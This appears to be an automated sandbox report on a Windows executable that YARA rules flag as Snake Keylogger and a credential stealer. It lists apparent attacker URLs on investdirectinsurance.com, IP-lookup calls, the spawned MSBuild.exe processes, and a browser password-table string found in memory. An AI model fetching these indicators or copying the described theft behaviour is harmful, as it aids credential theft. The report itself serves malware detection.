Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: investdirectinsurance.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org

Source: MSBuild.exe, 00000002.00000002.4118139508.0000000003519000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4118139508.000000000350C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4118139508.0000000003526000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4118139508.000000000356B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4118139508.0000000003477000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: MSBuild.exe, 00000002.00000002.4118139508.0000000003526000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.comh
Source: MSBuild.exe, 00000002.00000002.4118139508.0000000003519000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4118139508.000000000350C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4118139508.0000000003526000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4118139508.000000000346B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4118139508.000000000356B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4118139508.00000000034BA000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4118139508.0000000003477000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: MSBuild.exe, 00000002.00000002.4118139508.00000000033B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: R86BRY7DdC.exe, 00000000.00000002.1697512676.00000000128E9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4116615016.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: MSBuild.exe, 00000002.00000002.4118139508.000000000348F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4118139508.0000000003519000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4118139508.000000000350C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4118139508.0000000003562000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4118139508.0000000003526000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4118139508.000000000356B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: MSBuild.exe, 00000002.00000002.4118139508.00000000033B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: R86BRY7DdC.exe, 00000000.00000002.1699372606.000000001B7C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://investdirectinsurance.com/
Source: R86BRY7DdC.exe, 00000000.00000002.1696581955.0000000000B24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://investdirectinsurance.com/NO
Source: R86BRY7DdC.exe	String found in binary or memory: https://investdirectinsurance.com/assuence/litesolidCha/Ebagelog.bd
Source: R86BRY7DdC.exe	String found in binary or memory: https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bd
Source: R86BRY7DdC.exe, 00000000.00000002.1696581955.0000000000AF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bd-
Source: R86BRY7DdC.exe, 00000000.00000002.1696581955.0000000000AF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bdK
Source: R86BRY7DdC.exe, 00000000.00000002.1696581955.0000000000AC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bdN
Source: R86BRY7DdC.exe, 00000000.00000002.1696581955.0000000000AC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bdU
Source: R86BRY7DdC.exe, 00000000.00000002.1699372606.000000001B7C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bdi/certs/Micr
Source: R86BRY7DdC.exe, 00000000.00000002.1696581955.0000000000B24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://investdirectinsurance.com/zOO
Source: MSBuild.exe, 00000002.00000002.4118139508.0000000003519000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4118139508.000000000350C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4118139508.0000000003526000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4118139508.000000000356B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4118139508.00000000034BA000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4118139508.0000000003477000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: R86BRY7DdC.exe, 00000000.00000002.1697512676.00000000128E9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4116615016.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4118139508.0000000003477000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: MSBuild.exe, 00000002.00000002.4118139508.0000000003477000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: MSBuild.exe, 00000002.00000002.4118139508.0000000003519000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4118139508.000000000350C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4118139508.0000000003526000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4118139508.000000000356B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4118139508.00000000034BA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443

Source: unknown

HTTPS traffic detected: 172.67.189.102:443 -> 192.168.2.4:49730 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.R86BRY7DdC.exe.12a0f610.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.R86BRY7DdC.exe.12a0f610.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.R86BRY7DdC.exe.12a0f610.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.R86BRY7DdC.exe.12a0f610.2.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.R86BRY7DdC.exe.12a0f610.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.R86BRY7DdC.exe.12a0f610.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.R86BRY7DdC.exe.12a0f610.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.R86BRY7DdC.exe.12a0f610.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000002.00000002.4116615016.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000002.00000002.4116615016.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000000.00000002.1697512676.00000000128E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1697512676.00000000128E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: R86BRY7DdC.exe PID: 7148, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: R86BRY7DdC.exe PID: 7148, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: MSBuild.exe PID: 6400, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: MSBuild.exe PID: 6400, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_032CB328	2_2_032CB328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_032C6108	2_2_032C6108
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_032CC190	2_2_032CC190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_032C6730	2_2_032C6730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_032CC790	2_2_032CC790
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_032CBBD2	2_2_032CBBD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_032CCA70	2_2_032CCA70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_032C4AD9	2_2_032C4AD9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_032C9858	2_2_032C9858
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_032CEE68	2_2_032CEE68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_032CBEB0	2_2_032CBEB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_032CCD52	2_2_032CCD52
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_032CE379	2_2_032CE379
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_032CE388	2_2_032CE388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_032C3572	2_2_032C3572
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_032CB4F2	2_2_032CB4F2

Source: R86BRY7DdC.exe, 00000000.00000002.1697512676.00000000128E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs R86BRY7DdC.exe
Source: R86BRY7DdC.exe, 00000000.00000002.1697364760.0000000002822000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamegh2q.dll4 vs R86BRY7DdC.exe
Source: R86BRY7DdC.exe, 00000000.00000002.1697364760.0000000002822000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs R86BRY7DdC.exe
Source: R86BRY7DdC.exe, 00000000.00000002.1698267810.000000001B0E0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenamegh2q.dll4 vs R86BRY7DdC.exe

Source: 2.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.R86BRY7DdC.exe.12a0f610.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.R86BRY7DdC.exe.12a0f610.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.R86BRY7DdC.exe.12a0f610.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.R86BRY7DdC.exe.12a0f610.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.R86BRY7DdC.exe.12a0f610.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.R86BRY7DdC.exe.12a0f610.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.R86BRY7DdC.exe.12a0f610.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.R86BRY7DdC.exe.12a0f610.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000002.00000002.4116615016.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000002.00000002.4116615016.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.1697512676.00000000128E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1697512676.00000000128E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: R86BRY7DdC.exe PID: 7148, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: R86BRY7DdC.exe PID: 7148, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: MSBuild.exe PID: 6400, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: MSBuild.exe PID: 6400, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger

Source: 0.2.R86BRY7DdC.exe.12a0f610.2.raw.unpack, --K.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.R86BRY7DdC.exe.12a0f610.2.raw.unpack, --K.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.R86BRY7DdC.exe.12a0f610.2.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.R86BRY7DdC.exe.12a0f610.2.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/3@3/3

Source: C:\Users\user\Desktop\R86BRY7DdC.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Victim_SID[1].bd

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Mutant created: NULL

Source: R86BRY7DdC.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: R86BRY7DdC.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\R86BRY7DdC.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: MSBuild.exe, 00000002.00000002.4118139508.00000000035F5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4118139508.0000000003603000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4118139508.00000000035E5000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: R86BRY7DdC.exe	ReversingLabs: Detection: 42%
Source: R86BRY7DdC.exe	Virustotal: Detection: 32%

Source: unknown	Process created: C:\Users\user\Desktop\R86BRY7DdC.exe "C:\Users\user\Desktop\R86BRY7DdC.exe"
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior

Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll	Jump to behavior
